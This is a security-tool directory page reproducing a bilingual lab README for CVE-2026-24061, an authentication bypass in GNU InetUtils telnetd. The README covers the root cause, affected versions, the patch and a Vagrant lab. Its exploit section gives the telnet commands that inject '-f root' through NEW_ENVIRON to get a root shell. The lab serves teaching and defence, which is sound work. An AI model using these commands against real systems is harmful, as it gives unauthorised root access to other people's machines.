Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-24061-lab — CVE-2026-24061(GNU InetUtils telnetdの認証バイパス)の再現ラボ。Vagrantベースの分離環境と、ルートシェルアクセスを実証するためのステップバイステップの悪用手順を提供します。 | Kitploit
ツール/GitHubGitHub/akpmarcelin/cve-2026-24061-lab
脆弱性分析エクスプロイトペネトレーションテスト認証学習と教育ラボと実践
GitHubakpmarcelin/cve-2026-24061-lab

CVE-2026-24061-lab

CVE-2026-24061(GNU InetUtils telnetdの認証バイパス)の再現ラボ。Vagrantベースの分離環境と、ルートシェルアクセスを実証するためのステップバイステップの悪用手順を提供します。

リポジトリを見る
12ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-24061 — 再現ラボ

⚠️ 教育目的のみ。隔離されたラボ環境。

フランス語はこちら


概要

GNU InetUtils telnetd ≤ 2.7 における重大な認証バイパス(CVSS 9.8)。 Telnet の NEW_ENVIRON オプションを介して USER 変数として -f root を注入することで、 認証されていない攻撃者がパスワードなしで root シェルを取得できます。

根本原因

Telnet ネゴシエーション中にクライアントから受信した USER 変数が、 サニタイズなしで直接 /usr/bin/login に渡されます。

root@kitploit:~
/usr/bin/login -p -f root

-f フラグは、login に対して指定されたユーザーのパスワード検証をスキップするよう指示します。 この動作は RFC 1572(セクション 7)で既知のリスクとして文書化されていますが、 このバグは inetutils に10年以上にわたって存在していました。

影響を受けるバージョン

GNU InetUtils telnetd 1.9.3 から 2.7

パッチ

GNU InetUtils ≥ 2.7-2 にアップグレード

ラボのセットアップ

このラボでは Vagrant を使用して、脆弱なバージョンの telnetd(inetutils 2.5、ソースからコンパイル)を実行する実際の隔離された VM をプロビジョニングし、 可能な限り実際の環境に近づけます。

要件: マシンに Vagrant + VirtualBox がインストールされていること。

root@kitploit:~
git clone https://github.com/agokoli/cve-2026-24061-lab
cd cve-2026-24061-lab
vagrant up

VM は IP 192.168.56.10 で起動し、telnetd がポート 23 で待機します。

ラボプロビジョニング済み

エクスプロイト

ホストマシンから:

root@kitploit:~
telnet
telnet> environ define USER "-f root"
telnet> open 192.168.56.10 23

USER 変数は、ログインプロンプトが表示される前のネゴシエーションフェーズ中に、 Telnet の NEW_ENVIRON オプションを介して注入されます。

VMに接続 rootシェル取得

参考文献

  • NVD — CVE-2026-24061
  • RFC 1572 — Telnet Environment Option
  • GNU InetUtils ソース — telnetd/sys_term.c

著者

Agokoli



CVE-2026-24061 — Lab de démonstration

⚠️ Usage éducatif uniquement. Environnement isolé.

English above


Résumé

Contournement d'authentification critique (CVSS 9.8) dans GNU InetUtils telnetd ≤ 2.7. En injectant -f root comme valeur de la variable USER via l'option Telnet NEW_ENVIRON, un attaquant non authentifié peut obtenir un shell root sans aucun mot de passe.

Cause racine

La variable USER reçue du client pendant la négociation Telnet est passée directement à /usr/bin/login sans validation :

root@kitploit:~
/usr/bin/login -p -f root

Le flag -f indique à login de ne pas vérifier le mot de passe pour l'utilisateur donné. Ce risque est documenté dans la RFC 1572 (Section 7) — pourtant le bug est resté présent dans inetutils pendant plus d'une décennie.

Versions affectées

GNU InetUtils telnetd 1.9.3 à 2.7

Correctif

Mettre à jour vers GNU InetUtils ≥ 2.7-2

Mise en place du lab

Ce lab utilise Vagrant pour provisionner une vraie VM isolée faisant tourner la version vulnérable de telnetd (inetutils 2.5, compilé depuis les sources), afin d'être au plus proche d'un environnement réel.

Prérequis : Vagrant + VirtualBox installés sur votre machine.

root@kitploit:~
git clone https://github.com/agokoli/cve-2026-24061-lab
cd cve-2026-24061-lab
vagrant up

La VM démarre avec l'IP 192.168.56.10 et telnetd en écoute sur le port 23.

Lab provisionné

Exploitation

Depuis votre machine hôte :

root@kitploit:~
telnet
telnet> environ define USER "-f root"
telnet> open 192.168.56.10 23

La variable USER est injectée via l'option NEW_ENVIRON du protocole Telnet pendant la phase de négociation — avant même l'apparition du prompt login:.

Connexion à la VM Shell root obtenu

Références

  • NVD — CVE-2026-24061
  • RFC 1572 — Telnet Environment Option
  • Code source GNU InetUtils — telnetd/sys_term.c

Auteur

Agokoli

ツールをダウンロード